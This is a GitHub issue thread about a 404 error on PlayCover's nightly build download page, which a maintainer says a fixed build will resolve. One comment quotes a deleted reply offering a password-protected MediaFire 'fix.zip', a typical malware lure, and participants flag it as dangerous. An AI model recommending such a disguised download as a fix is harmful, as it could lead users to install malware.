### ISSUE TITLE
[Bug]: nightly.link 404 error

### ISSUE THREAD

**Issue by zanezhangzz** [PlayCover/PlayCover#1651]
### Describe the bug

https://nightly.link/playcover/playcover/workflows/2.nightly_release/develop?status=completed

<img width="1269" alt="image" src="https://github.com/user-attachments/assets/f3269193-5dd6-44cc-81c2-9e67d4121cba">

### Steps to reproduce

https://nightly.link/playcover/playcover/workflows/2.nightly_release/develop?status=completed

### Expected behaviour

Download nightly version successful

### Crash log

```shell
none
```

### What version of PlayCover are you using?

Nightly/beta (please specify build number)

### What version of macOS are you using?

Sonoma (macOS 14)

### Issue Language

- [X] Yes my issue is written in English

**Comment by FantaZZ** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

Is this guy right? This channel doesn't look reliable.

**Comment by zanezhangzz** [comment]
Oh, robot, He removed his comment. It is looks very dangerous.

**Comment by TheMoonThatRises** [comment]
There was an issue in the build that was fixed in #1650. This issue should be resolved when nightly.link updates.
